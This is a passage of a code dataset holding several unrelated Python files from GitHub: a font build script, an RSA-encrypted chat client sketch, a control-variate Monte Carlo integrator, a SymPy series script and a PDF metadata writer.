'store/checkout.html', context)\n","repo_name":"meghathomas1999/Greatcart","sub_path":"carts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15768803432","text":"# -*- coding: utf-8 -*-\n\nimport fontforge\nimport datetime\nimport textwrap\nimport argparse\nimport psMat\nimport json\nimport csv\nimport os\nimport sys\n\nversion = '1.2.0'\ntoday = datetime.date.today()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('ricty')\nparser.add_argument('firacode')\nparser.add_argument('out_font')\nparser.add_argument('weight')\nparser.add_argument('discord')\noptions = parser.parse_args(sys.argv[1:])\n\nif options.discord == 'true':\n    fontname = 'RictyDiminishedDiscordWithFiraCode'\n    familyname = 'Ricty Diminished Discord with Fira Code'\nelse:\n    fontname = 'RictyDiminishedWithFiraCode'\n    familyname = 'Ricty Diminished with Fira Code'\nweight = options.weight\n\nricty = 
fontforge.open(options.ricty)\nfiracode = fontforge.open(options.firacode)\n\n# Load ligatures data and create data to generate feature file\nwith open('ligatures.csv', 'r') as file:\n ligatures_reader = csv.reader(file, delimiter=' ')\n\n ligatures = []\n nullable_glyphs = []\n glyphs = []\n\n for [components, source_type, name] in ligatures_reader:\n glyphs.append((source_type, name))\n component_names = list(map(lambda c: ricty[ord(c)].glyphname, list(components)))\n\n nullable_glyphs.extend(component_names[:-1])\n\n ligatures.append({\n 'glyph': name,\n 'components': component_names,\n 'lookup': '_'.join(map(lambda name: name.upper(), component_names)),\n })\n\n# Unique\nnullable_glyphs = list(set(nullable_glyphs))\n\n# Dump data\nwith open('data.json', 'w') as file:\n file.write(json.dumps({\n 'ligatures': ligatures,\n 'nullable_glyphs': nullable_glyphs,\n }))\n\n# Copy needed glyphs from Fira Code font to Ricty\nfor (source_type, name) in glyphs:\n ricty.createChar(-1, name)\n\n if source_type == 'svg':\n ricty[name].importOutlines('svg/{}.{}.svg'.format(name, weight))\n ricty[name].width = 500\n elif source_type == 'glf':\n firacode.selection.select(name)\n firacode.copy()\n ricty.selection.select(name)\n ricty.paste()\n\n ricty.transform(psMat.compose(psMat.scale(500 / 1200), psMat.translate(0, 50)))\n ricty[name].width = 500\n\n# Import Powerline glyphs\npowerline_codes = [0xE0A0, 0xE0A1, 0xE0A2, 0xE0B0, 0xE0B1, 0xE0B2, 0xE0B3]\n\nfor codepoint in powerline_codes:\n ricty.createChar(codepoint)\n firacode.selection.select(('unicode',), codepoint)\n firacode.copy()\n ricty.selection.select(('unicode',), codepoint)\n ricty.paste()\n\n# Modify glyphs\n\n# Branch\nricty[0xE0A0].transform(psMat.translate(-50, 0))\n# Line Number\nricty[0xE0A1].transform(psMat.translate(-50, 0))\n# Locked\nricty[0xE0A2].transform(psMat.scale(500 / 600))\n\n# Reset widths\nfor codepoint in powerline_codes:\n ricty[codepoint].width = 500\n\n# Set font name\nricty.familyname = familyname\nricty.fontname = '{}-{}'.format(fontname, weight)\nricty.fullname = '{} {}'.format(familyname, weight)\nricty.weight = weight\n\n# Set base version of the font\nricty.version = version\n\n# Unset other version names to make them auto-calculated by FontForge\nricty.sfntRevision = None\nricty.woffMajor = None\nricty.woffMinor = None\n\nricty.copyright = textwrap.dedent('''\\\n Copyright (c) 2012-2014 Yasunori Yusa\n Copyright (c) 2006 Raph Levien\n Copyright (c) 2006-2013 itouhiro\n Copyright (c) 2002-2013 M+ FONTS PROJECT\n Copyright (c) 2014 Mozilla Foundation\n Copyright (c) 2014 Telefonica S.A.\n Copyright (c) 2014 Nikita Prokopov\n Copyright (c) 2014 The Fira Code Project Authors (https://github.com/tonsky/FiraCode)\n Copyright (c) 2016-2019 Koki Takahashi\n License:\n SIL Open Font License Version 1.1 (http://scripts.sil.org/ofl)\n''')\n\nwith open('LICENSE') as file:\n ricty.appendSFNTName('English (US)', 'License', file.read())\n\nricty.appendSFNTName('English (US)', 'License URL', 'http://scripts.sil.org/OFL')\n\nricty.appendSFNTName('English (US)', 'UniqueID', '{} {} : {} : {}'.format(familyname, weight, version, today.isoformat()))\n\n# Export\ntry:\n os.remove(options.out_font)\nexcept OSError:\n pass\nricty.generate(options.out_font)\n","repo_name":"hakatashi/RictyDiminished-with-FiraCode","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"72"} +{"seq_id":"41783158679","text":"import 
protocol\nimport socket\nimport socketserver\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import hashes\n\nHOST, PORT_R, PORT_A, PORT_SER = \"localhost\", 30333, 50555, 3333\nINITIALIZE, REGISTER, ESTABLISHED = 0x00, 0x01, 0x02\n\nclass User_server(socketserver.BaseRequestHandler):\n    def handle(self):\n        self.data = self.request.recv(1024).strip()\n        self.request.sendall(self.data.upper())\n\n##TODO\n# with socketserver.TCPServer((ADDR, PORT_SER), user_server) as server:\n#     server.serve_forever()\n\nclass User_client:\n    def __initialize__(self):\n        self.username = input('Please enter your nickname: ')\n        print('Hello ' + self.username)\n        try:\n            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            self.sock.connect((HOST, PORT_R))\n            self.state = REGISTER\n        except OSError as err:\n            # connection failures raise OSError, not ValueError\n            print(f'Cannot connect with the {HOST}:{PORT_R}: {err}.')\n    def __register__(self):\n        if self.state == REGISTER:\n            with open('keys/rs.key.pub', 'rb') as key_file:\n                self.public_reg_serv_key = serialization.load_pem_public_key(\n                    key_file.read(),\n                    backend=default_backend()\n                )\n            self.private_key = rsa.generate_private_key(\n                public_exponent=65537, key_size=4096, backend=default_backend()\n            )\n            self.public_key = self.private_key.public_key()\n            sec_unm = self.public_reg_serv_key.encrypt(\n                bytes(\n                    self.username, 'utf-8'\n                ),\n                padding.OAEP(\n                    padding.MGF1(\n                        algorithm=hashes.SHA256()\n                    ),\n                    algorithm=hashes.SHA256(),\n                    label=None)\n            )\n            msg_id = bytes(protocol.REG_REQUEST)\n            self.data = msg_id + sec_unm + bytes(self.public_key.public_bytes(\n                encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo\n            ))\n            self.sock.sendto(self.data, (HOST, PORT_R))\n            self.data = self.sock.recv(1024)\n            un_data = self.private_key.decrypt(\n                self.data,\n                padding.OAEP(mgf=padding.MGF1(\n                    algorithm=hashes.SHA256()),\n                    algorithm=hashes.SHA256(),\n                    label=None))\n            if un_data == protocol.REG_ACCEPTED:\n                print('REGISTERED!')\n                self.state = ESTABLISHED\n                self.__instant_work__()\n            elif un_data == protocol.REG_ERROR_OCCUPIED:\n                print('REGISTER_ERROR: Username is already registered. Choose another one! :)')\n                self.__register__()\n            else:\n                print('ERROR')\n            return\n    def __instant_work__(self):\n        action_id = input('''\n        Now you can choose an action:\n        Start messaging (1)\n        Change username (2)\n        Finish today (0)\n        ''')\n        print('OK')\n        action_id = int(action_id)\n        if action_id == 1:\n            self.__messanging__()\n        elif action_id == 2:\n            self.__unregister__()\n            self.__register__()\n        elif action_id == 0:\n            self.__unregister__()\n            self.sock.close()\n            print('Finished! 
ByeBye!')\n exit()\n\n def __messanging__(self):\n user=input('Who do you want to write to?')\n print('OK, Trying!')\n self.data=self.public_reg_serv_key.encrypt(\n protocol.GET_USR_REQUEST+bytes(user,'utf-8'),\n padding.OAEP(\n padding.MGF1(\n algorithm=hashes.SHA256()\n ),\n algorithm=hashes.SHA256(),\n label=None)\n )\n self.sock.sendto(self.data, (HOST, PORT_R))\n print(f'sent {protocol.GET_USR_REQUEST} and {self.data}')\n def __unregister__(self):\n pass\n\nclass Cryptonger(User_server,User_client):\n data, sock, private_key, public_key = None,None,None,None\n public_reg_serv_key=None\n def __init__(self):\n self.state=INITIALIZE\n print('''\n Welcome to the Save Crypto Messager!\n Enjoy!\n ''')\n self.__initialize__()\n self.__register__()\n\n \nif __name__=='__main__':\n safe_client=Cryptonger() \n \n\n\n\n\n","repo_name":"swiru95/SafeMessanger","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4403252238","text":"\"\"\"\nFile that holds the CVIntegrator class\n\"\"\"\n\nfrom copy import deepcopy\nfrom numbers import Number\nfrom re import findall\nfrom sys import getsizeof\nfrom typing import Optional, Sequence, Union\n\nimport numpy as np\nfrom numpy.random import RandomState\nfrom vegas import Integrator\n\nfrom ._types import _ftype\nfrom ._wrappers import check_attrs, timing\nfrom .functions import Function, make_func\n\n\ndef classic_integrate(\n function: _ftype,\n evals: int,\n tot_iters: int,\n bounds: Union[Sequence[tuple[float, float]], tuple[float, float]],\n cv_iters: Optional[Union[list[int], int, str]] = None,\n cv_means: Union[float, Sequence[float]] = 1,\n cname: str = None,\n name: str = None,\n **params: float,\n):\n \"\"\"\n A convenience method if you don't want to create a custom Function class via\n make_func. This method will do it for you, pass the class to the CVIntegrator and\n run the integrate method, passing back the CVIntegrator.\n\n Parameters:\n function - The function to be integrated. Must be vectorized, see the docstring for\n make_func for more info (from control_vegas import make_func).\n evals - Number of Vegas evaluations per iteration (called `neval` by Vegas). This\n is the default value used by create_maps, get_is_cv_values but those can be\n specified separately.\n tot_iters - Total number of iterations for Vegas to do (called `nitn` by Vegas).\n bounds - The bounds of the integration for each dimension given as a list of tuples.\n The CVIntegrator class uses the dimension from the Function class so that the\n bounds argument is optional. But here it is opposite, the dimension of the\n function is implied from the number of bounds.\n cv_iters - List of iterations to use as CVs. See the docstring for CVIntegrator\n for more information about the options. Most simply can be an integer\n representing a single CV or a list of integers representing multiple.\n cv_means (default 1) - The value of E[g_i] but by the scheme laid out in\n `get_is_cv_values` to obtain the control variate, E[g_i] should be approximately\n one.\n cname (default None) - The name of the class of the Function passed to CVIntegrator.\n If not specified, the __name__ attribute of `function` is passed capitalized.\n name (default None) - The name attribute of the Function. 
If not specified,\n            the __name__ attribute is passed as is.\n        params - Parameters for the function.\n    \"\"\"\n    # make Function object\n    function = make_func(\n        cname=function.__name__.capitalize() if cname is None else cname,\n        dimension=len(bounds),\n        function=function,\n        name=function.__name__ if name is None else name,\n        **params,\n    )\n    # Create integrator object\n    cvi = CVIntegrator(\n        function=function,\n        evals=evals,\n        tot_iters=tot_iters,\n        bounds=bounds,\n        cv_iters=cv_iters,\n        cv_means=cv_means,\n    )\n    # And integrate\n    cvi.integrate()\n    return cvi\n\n\nclass CVIntegrator:\n    \"\"\"\n    Integrating a function f, we can equivalently integrate f' = f + c(g - E[g]) where the\n    expectation value of g is known. Choosing the optimal value for c will necessarily\n    reduce the variance. We can have an arbitrary number of g's (called control variates\n    (CVs)). Here we use a previous Vegas adapted iteration of f for g. So if we have a\n    total of N iterations of f, then we can have a maximum of N-1 CVs.\n\n    Below, f' is called self.weight_prime (or the 'CV function'), f is self.weight_value\n    (or the 'adapted/IS function') and the CVs (the g_i's) are elements of the list\n    self.cv_values. This is the terminology used in the docstrings below.\n\n    Explanation of parameters:\n        neval - Passed on instantiation of class, check __init__ docstring for details.\n        nitn - The number of iterations the Integrator is run to get the adapted\n            function.\n        cv_nums - The number of control variates.\n        map_neval - The number of evaluations per iteration when initially creating the\n            map. Defaults to neval.\n        jac_neval - The size of the Jacobian arrays, i.e. how finely split up the\n            integration region is. Defaults to neval*nitn.\n        tot_neval - The total number of evaluations done when creating the fully adapted\n            map.\n    \"\"\"\n\n
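    # Added note (editor, not part of the original source): for a single control\n    # variate g, the linear solve in _find_coefficients reduces to the textbook\n    # optimum c* = -Cov(f, g) / Var(g), which yields\n    # Var(f') = Var(f) * (1 - corr(f, g)**2).\n\n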
    # Should you print out the time it takes for the main functions to run?\n    TIMING = False\n    # Memory threshold for when `memory=\"tiny\"`\n    TINY_THRESHOLD = 100\n    # Integer code for the 'auto1' option of cv_iters\n    AUTO1 = [1e15]\n\n    def __init__(\n        self,\n        function: Function,\n        evals: int,\n        tot_iters: int,\n        bounds: Optional[Sequence[tuple[float, float]]] = None,\n        cv_iters: Optional[Union[list[int], int, str]] = None,\n        cv_means: Union[float, Sequence[float]] = 1,\n        rng_seed: Optional[int] = None,\n        memory: str = \"medium\",\n    ):\n        \"\"\"\n        Takes in a Function class object from functions.py. One can make their own using\n        the make_func function found in that file.\n\n        Parameters:\n            function - Function class with f to integrate.\n            evals - Number of Vegas evaluations per iteration (called `neval` by Vegas).\n                This is the default value used by create_maps, get_is_cv_values but those\n                can be specified separately.\n            tot_iters - Total number of iterations for Vegas to do (called `nitn` by Vegas).\n            bounds (default None) - The bounds of the integration for each dimension. If not\n                given, defaults to [0, 1] for every dimension.\n            cv_iters (default None) - List of iterations to use as CVs. Defaults to no CVs.\n                Can be passed as a single integer which is considered as a single control\n                variate. Can also be passed as a string:\n                - 'all': Use every iteration as a control variate.\n                - 'all%n': Use every iteration mod n. For example, if tot_iters=10\n                    and cv_iters='all%2', then it uses [2, 4, 6, 8]\n                - 'all%n+b': Use every iteration (shifted by b) mod n. For example, if\n                    tot_iters=10 and cv_iters='all%2+1', then use [1, 3, 5, 7, 9]\n                - 'auto1': Will automatically assign a single CV by testing each\n                    possibility with a small number of events\n            cv_means (default 1) - The value of E[g_i] but by the scheme laid out in\n                `get_is_cv_values` to obtain the control variate, E[g_i] should be\n                approximately one.\n            rng_seed (default None) - The seed to use for the numpy RandomState class.\n                Useful for testing with the same numbers. Note: vegas's Integrator does\n                not have a seed argument, so self.create_maps runs unseeded, unlike\n                self.get_is_cv_values and self.get_weight_prime. If no seed is\n                passed, a random one will be created.\n            memory (default 'medium') - Either 'tiny', 'medium', 'large' or 'max'. Determines\n                what is saved. If 'max', save everything. If 'large', don't save self.xs\n                and self.is_jac. If 'medium', additionally don't save self.weight_value and\n                self.weight_prime. If 'tiny', remove everything below the threshold\n                TINY_THRESHOLD.\n        \"\"\"\n        # Initialize private attributes for the properties\n        self._init_results()\n        # Ordering of timing if activated\n        if self.TIMING:\n            self.timing_count = 1\n\n        self.function = function\n        self.bounds = self.function.dim * [[0, 1]] if bounds is None else bounds\n        self.neval = evals\n        self.nitn = tot_iters\n\n        self.cv_nitn = cv_iters\n        # Create empty list if not specified, i.e. no control variates\n        if self.cv_nitn is None:\n            self.cv_nitn = []\n        # If cv_iters is a number, put it into a list\n        if isinstance(self.cv_nitn, (int, np.integer)):\n            self.cv_nitn = [self.cv_nitn]\n        if isinstance(self.cv_nitn, str):\n            # Find the mod and shift using regex\n            all_str = findall(r\"^all%(\\d+)(?:\\+(\\d+))?$\", self.cv_nitn)\n            if all_str:\n                # Extract those parameters (0 shift if not specified)\n                mod = int(all_str[0][0])\n                shift = 0 if not all_str[0][1] else int(all_str[0][1])\n                # Create list according to those numbers\n                shifted_cv_nitns = np.where(np.arange(self.nitn) % mod == 0)[0] + shift\n                self.cv_nitn = list(shifted_cv_nitns[shifted_cv_nitns < self.nitn])\n            elif self.cv_nitn == \"all\":\n                self.cv_nitn = list(range(1, self.nitn))\n            elif self.cv_nitn == \"auto1\":\n                self.cv_nitn = self.AUTO1\n\n        # Iteration 0 is no iteration at all, so remove it\n        if 0 in self.cv_nitn:\n            self.cv_nitn.remove(0)\n\n        self.num_cvs = len(self.cv_nitn)\n        self.cv_means = cv_means\n        # A number implies a constant mean value\n        if isinstance(self.cv_means, Number):\n            self.cv_means = self.num_cvs * [cv_means]\n\n        self.rng_seed = np.random.randint(0, 1e9) if rng_seed is None else rng_seed\n        self.memory = memory\n\n    def _init_results(self):\n        \"\"\"Initializes the private attributes for the listed properties.\"\"\"\n        for name, obj in self.__class__.__dict__.items():\n            if isinstance(obj, property):\n                self.__setattr__(f\"_{name}\", np.nan)\n\n    @timing\n    def create_maps(\n        self, map_neval: Optional[int] = None, auto1_neval: Optional[int] = None\n    ) -> None:\n        \"\"\"\n        Creates the maps corresponding to the adapted function, f, and the\n        control variates, g_i.\n\n        Parameters:\n            map_neval (default None) - The number of evaluations per iteration as\n                the maps are being created. Defaults to `self.neval`.\n            auto1_neval (default None) - Only used if `cv_iters` was set to 'auto1'.\n                The number of iterations to use for the testing of each CV. 
Defaults\n to the value of `self.map_neval`.\n \"\"\"\n self.map_neval = self.neval if map_neval is None else map_neval\n integrator = Integrator(self.bounds)\n self._cv_maps = []\n self.tot_neval = 0\n\n # Will adapt maps as usual, but then test each map as a single CV with\n # `auto1_neval` events to get an estimate of which CV is best to use\n if self.cv_nitn == self.AUTO1:\n auto1_neval = self.map_neval if auto1_neval is None else auto1_neval\n # Run for a smaller number of points for every possibility\n self._tmp_cv_maps = []\n # Copy every map iteration\n for nitn in range(self.nitn - 1):\n result = integrator(self.function._f, nitn=1, neval=self.map_neval)\n self._tmp_cv_maps.append(deepcopy(integrator.map))\n self.tot_neval += int(result.sum_neval)\n\n result = integrator(self.function._f, nitn=1, neval=self.map_neval)\n self._is_map = deepcopy(integrator.map)\n self.tot_neval += int(result.sum_neval)\n\n # Run through each map and see what the VRP is\n vrps = []\n for ind, cv_map in enumerate(self._tmp_cv_maps):\n self._cv_maps = [cv_map]\n\n self.get_is_cv_values(jac_neval=auto1_neval)\n self.get_weight_prime()\n vrps.append(self.vrp)\n # Find which index/map gives the maximum VRP and use that\n max_vrp_ind = np.argmax(vrps)\n self.cv_nitn = [max_vrp_ind + 1]\n self._cv_maps = [self._tmp_cv_maps[max_vrp_ind]]\n # Will adapt maps until a CV is reached and save that CV and keep going\n elif self.cv_nitn:\n # Run integrator for number of iterations until we reach first CV\n result = integrator(\n self.function._f, nitn=self.cv_nitn[0], neval=self.map_neval\n )\n # Save map for CV\n self._cv_maps.append(deepcopy(integrator.map))\n self.tot_neval += int(result.sum_neval)\n # For loop if there is more than 1 CV to save the others\n for cv_nitn_diff in np.diff(self.cv_nitn):\n # Same process as before\n result = integrator(\n self.function._f, nitn=cv_nitn_diff, neval=self.map_neval\n )\n self._cv_maps.append(deepcopy(integrator.map))\n self.tot_neval += int(result.sum_neval)\n\n # And save the final map as the IS map\n result = integrator(\n self.function._f,\n nitn=self.nitn - self.cv_nitn[-1],\n neval=self.map_neval,\n )\n self._is_map = deepcopy(integrator.map)\n self.tot_neval += int(result.sum_neval)\n # This option is for no CVs, so don't save any for the CV\n else:\n # Only have an IS map if there are no CVs\n result = integrator(self.function._f, nitn=self.nitn, neval=self.map_neval)\n self._is_map = deepcopy(integrator.map)\n self.tot_neval += int(result.sum_neval)\n\n @timing\n def get_is_cv_values(self, jac_neval: Optional[int] = None) -> None:\n \"\"\"\n Calculates the adapted function and the control variates from their maps.\n\n Parameters:\n jac_neval (default None) - The number of steps to split up `ys`, the unit\n hypercube, into. Defaults to `self.tot_neval`, the total number of\n iterations used when adapting the map.\n \"\"\"\n self.jac_neval = self.tot_neval if jac_neval is None else jac_neval\n rng = RandomState(seed=self.rng_seed)\n\n # Uniformly distributed unit hypercube\n ys = rng.uniform(0, 1, (self.jac_neval, self.function.dim))\n # Find the Jacobian. 
If by importance sampling we transform f -> f/p, then\n # the Jacobian is 1/p\n xs = np.empty(ys.shape, float)\n is_jac = np.empty(ys.shape[0], float)\n self._is_map.map(ys, xs, is_jac)\n # The IS values\n self.weight_value = is_jac * self.function._f(xs)\n\n # Find the Jacobian(s) for the CV(s)\n self.cv_values, self.cv_jacs = [], []\n for cv_map in self._cv_maps:\n # Use inverse map for control variate to find CV Jacobian\n t_inv = np.empty(xs.shape, float)\n cv_jac = np.empty(xs.shape[0], float)\n cv_map.invmap(xs, t_inv, cv_jac)\n\n self.cv_values.append(is_jac / cv_jac)\n self.cv_jacs.append(cv_jac)\n\n if self.memory == \"max\":\n self.xs = xs\n self.is_jac = is_jac\n\n @timing\n def get_weight_prime(self) -> None:\n \"\"\"\n Calculates the final CV function by finding the optimal coefficients\n for the control variates.\n \"\"\"\n self._find_coefficients()\n self.weight_prime = self.weight_value + sum(\n [\n self.cs[ind] * (self.cv_values[ind] - self.cv_means[ind])\n for ind in range(self.num_cvs)\n ]\n )\n\n def _find_coefficients(self) -> None:\n \"\"\"\n Finds the optimized values for the CV coefficients to minimize the variance via\n a matrix. Our equation to solve is of the form A=Bc where A and c are arrays and\n B is a matrix. We solve for c.\n\n The ith value of a control variate can be correlated to its coefficient, so\n removing said value when calculating the covariance would remove this\n correlation while still maintaining a good approximation of it. In effect,\n this would look like a covariance for each ith point. But this subtlety does\n not have a noticeable effect on the result, while slowing the algorithm down\n several-fold, so it isn't done.\n \"\"\"\n # Populate the B matrix\n Bs = np.cov(self.cv_values)\n As = np.array([-np.cov(self.weight_value, cv)[0, 1] for cv in self.cv_values])\n\n # np.cov returns 0D array if there's only one element, so turn it into a matrix\n if self.num_cvs == 1:\n Bs = Bs.reshape(1, 1)\n # Solve the system of equations\n cs = np.linalg.solve(Bs, As)\n self.cs = cs.T\n\n @timing\n def integrate(\n self,\n map_neval: Optional[int] = None,\n jac_neval: Optional[int] = None,\n auto1_neval: Optional[int] = None,\n ) -> None:\n \"\"\"\n Runs the necessary functions to integrate the function in the order:\n 1) self.create_maps\n 2) self.get_is_cv_values\n 3) self.get_weight_prime\n Check out the docstrings of these functions for more info on them.\n\n Parameters:\n map_neval (default None) - From self.create_maps docstring: The number of\n evaluations per iteration as the maps are being created. Defaults to\n `self.neval`.\n jac_neval (default None) - From self.get_is_cv_values docstring: The number of\n steps to split up `ys`, the unit hypercube, into. Defaults to\n `self.tot_neval`, the total number of iterations used when adapting the map.\n auto1_neval (default None) - Only used if `cv_iters` was set to 'auto1'.\n The number of iterations to use for the testing of each CV. Defaults\n to the value of `self.map_neval`.\n \"\"\"\n self.create_maps(map_neval=map_neval, auto1_neval=auto1_neval)\n self.get_is_cv_values(jac_neval=jac_neval)\n if self.cv_values:\n # only run if we are using control variates\n self.get_weight_prime()\n self.garbage_collect()\n\n @timing\n def garbage_collect(self, memory: Optional[str] = None) -> None:\n \"\"\"\n Deletes attributes depending on choices of self.memory to clear up memory.\n\n Parameters:\n memory (default None) - A measure of how many attributes to delete to clear up\n memory. 
Can be 'max', 'large', 'medium' or 'tiny'. More info in the class\n __init__ docstring.\n \"\"\"\n memory = memory or self.memory\n\n # Initialize properties so result is saved before deleting arrays they need\n self.stdev\n self.mean\n self.w_stdev\n self.w_mean\n\n # Large arrays not used in anything\n if memory in {\"large\", \"medium\", \"tiny\"}:\n self._delete(\"xs\", \"is_jac\")\n # Large arrays but used in properties below\n if memory in {\"medium\", \"tiny\"}:\n self._delete(\"weight_prime\", \"weight_value\")\n # All bigger than a certain threshold\n if memory == \"tiny\":\n attr_items = list(self.__dict__.items())\n for attr, attr_val in attr_items:\n if getsizeof(attr_val) > self.TINY_THRESHOLD:\n self.__delattr__(attr)\n\n def _delete(self, *attrs):\n \"\"\"Delete attribute if it still exists as one.\"\"\"\n for attr in attrs:\n if attr in self.__dir__():\n self.__delattr__(attr)\n\n @property\n @check_attrs(\"weight_prime\", \"jac_neval\")\n def stdev(self) -> float:\n \"\"\"Standard deviation of CV function\"\"\"\n self._stdev = np.std(self.weight_prime) / np.sqrt(self.jac_neval)\n return self._stdev\n\n @property\n @check_attrs(\"weight_value\", \"jac_neval\")\n def w_stdev(self) -> float:\n \"\"\"Standard deviation of IS function\"\"\"\n self._w_stdev = np.std(self.weight_value) / np.sqrt(self.jac_neval)\n return self._w_stdev\n\n @property\n @check_attrs(\"stdev\")\n def var(self) -> float:\n \"\"\"Variance of CV function\"\"\"\n self._var = self.stdev**2\n return self._var\n\n @property\n @check_attrs(\"w_stdev\")\n def w_var(self) -> float:\n \"\"\"Variance of IS function\"\"\"\n self._w_var = self.w_stdev**2\n return self._w_var\n\n @property\n @check_attrs(\"weight_prime\")\n def mean(self) -> float:\n \"\"\"Mean of CV function\"\"\"\n self._mean = np.mean(self.weight_prime)\n return self._mean\n\n @property\n @check_attrs(\"weight_value\")\n def w_mean(self) -> float:\n \"\"\"Mean of IS function\"\"\"\n self._w_mean = np.mean(self.weight_value)\n return self._w_mean\n\n @property\n def vrp(self) -> float:\n \"\"\"\n Variance reduction in percentage, i.e. by what percent was the variance\n reduced due to the CVs.\n \"\"\"\n self._vrp = 1 - self.var / self.w_var\n return self._vrp\n\n def compare(\n self, rounding: int = 3, cutoff: Union[int, tuple[int, int]] = 3\n ) -> None:\n \"\"\"\n Print out the mean, variance and standard deviation without and with the CVs.\n\n Parameters:\n rounding - How many digits to round the numbers to.\n cutoff - The power (base 10) at which to switch from floating point to\n scientific notation. That is if `cutoff=3`, then any value that is less than\n 10^-3 or greater than 10^3 will be printed in scientific notation. Can also\n be given as a tuple representing the lower and upper bound separately. 
So if\n `cutoff=(-3, 5)`, then the value would be printed in scientific notation if\n it is less than 10^-3 or greater than 10^5.\n \"\"\"\n if isinstance(cutoff, int):\n neg_co, pos_co = 10 ** (-cutoff), 10**cutoff\n else:\n # Use the tuple entries directly so that, as documented, cutoff=(-3, 5)\n # gives bounds of 10^-3 and 10^5\n neg_co, pos_co = 10 ** cutoff[0], 10 ** cutoff[1]\n\n def vtype(val):\n \"\"\"Returns 'e' for scientific notation or 'f' for float\"\"\"\n if np.isnan(val) or (val > neg_co and val < pos_co):\n return \"f\"\n return \"e\"\n\n w_mean = f\"{self.w_mean:.{rounding}{vtype(self.w_mean)}}\"\n w_var = f\"{self.w_var:.{rounding}{vtype(self.w_var)}}\"\n w_stdev = f\"{self.w_stdev:.{rounding}{vtype(self.w_stdev)}}\"\n mean = f\"{self.mean:.{rounding}{vtype(self.mean)}}\"\n var = f\"{self.var:.{rounding}{vtype(self.var)}}\"\n stdev = f\"{self.stdev:.{rounding}{vtype(self.stdev)}}\"\n vrp = f\"{100 * self.vrp:.{rounding}{vtype(100 * self.vrp)}}%\"\n\n plural = \"s\" if len(self.cv_nitn) > 1 else \"\"\n titles = f\"No CV{plural}\", f\"With CV{plural}\"\n print(f\"{9*' '}|{titles[0]:^{8 + rounding}}|{titles[1]:^{8 + rounding}}\")\n print(f\"---------+{'-'*(8 + rounding)}+{'-'*(8 + rounding)}\")\n print(f\"Mean |{w_mean:>{7 + rounding}} |{mean:>{7 + rounding}}\")\n print(f\"Variance |{w_var:>{7 + rounding}} |{var:>{7 + rounding}}\")\n print(f\"St Dev |{w_stdev:>{7 + rounding}} |{stdev:>{7 + rounding}}\")\n print(f\"VRP |{' ' * (7 + rounding)} |{vrp:>{7 + rounding}}\")\n","repo_name":"crumpstrr33/covvvr","sub_path":"src/covvvr/cvintegrator.py","file_name":"cvintegrator.py","file_ext":"py","file_size_in_byte":22794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37921580200","text":"# ASSIGNMENT NAME: HW 8\n# NAME: Chance Cardona \n# EMAIL: ccardona@mymail.mines.edu \n# DATE: 12/2/18\n# DESCRIPTION: Sympy proof from Problem 3 of HW 8.\n# OTHER NOTES:\n\nfrom sympy import Symbol, cos, series, exp, diff\n\nx = Symbol('x')\n\ndef func(x):\n return -1/(1 - exp(-x))\n\ndef main(k, terms):\n d = diff(func(x), x, k)\n print(d)\n a = series(d, x, n=terms)\n print(\"The derivative of order {} with the first {} terms of its Taylor series is \n{}\".format(k, terms, a))\n\n return a\n\nnum = 3\norder = 3\nmain(order, num)\n","repo_name":"chancecardona/MathPhysics","sub_path":"SymbolicMath/zetaSymbolicExpander.py","file_name":"zetaSymbolicExpander.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41930202062","text":"from typing import Dict\nfrom pypdf import PdfReader, PdfWriter, DocumentInformation\n\nclass PDFMetadata(object):\n def __init__(self, metadata: Dict[str, str], originalPDF: str = \"\", modifiedPDF: str = \"\", \n keepOriginalMetadata: bool = True) -> None:\n self.metadata: Dict[str, str] = metadata\n self.modifiedPDF: str = modifiedPDF\n self.keepOriginalMetadata: bool = keepOriginalMetadata\n\n try:\n self.pdfFileReader = PdfReader(originalPDF)\n except Exception as e:\n raise Exception(\"ERROR READING PDF FILE :: %s\" % (originalPDF))\n \n try:\n self.pdfFileWriter = PdfWriter()\n except Exception as e:\n raise Exception(\"ERROR CREATING PDF WRITER :: %s\" % (e))\n \n\n def write(self):\n try:\n metadata = {}\n if self.keepOriginalMetadata:\n metadata = {**dict(self.read()), **self.metadata}\n else:\n metadata = self.metadata\n\n # region Adding pages to the writer\n for page in self.pdfFileReader.pages:\n self.pdfFileWriter.add_page(page)\n # endregion\n\n # region Writing Final PDF\n 
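# Note: pypdf Info-dictionary keys conventionally start with \"/\", so the dict\n # passed to add_metadata should look like {\"/Author\": \"Jane Doe\", \"/Title\": \"Report\"};\n # the key and value names in this comment are illustrative examples only.\n 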
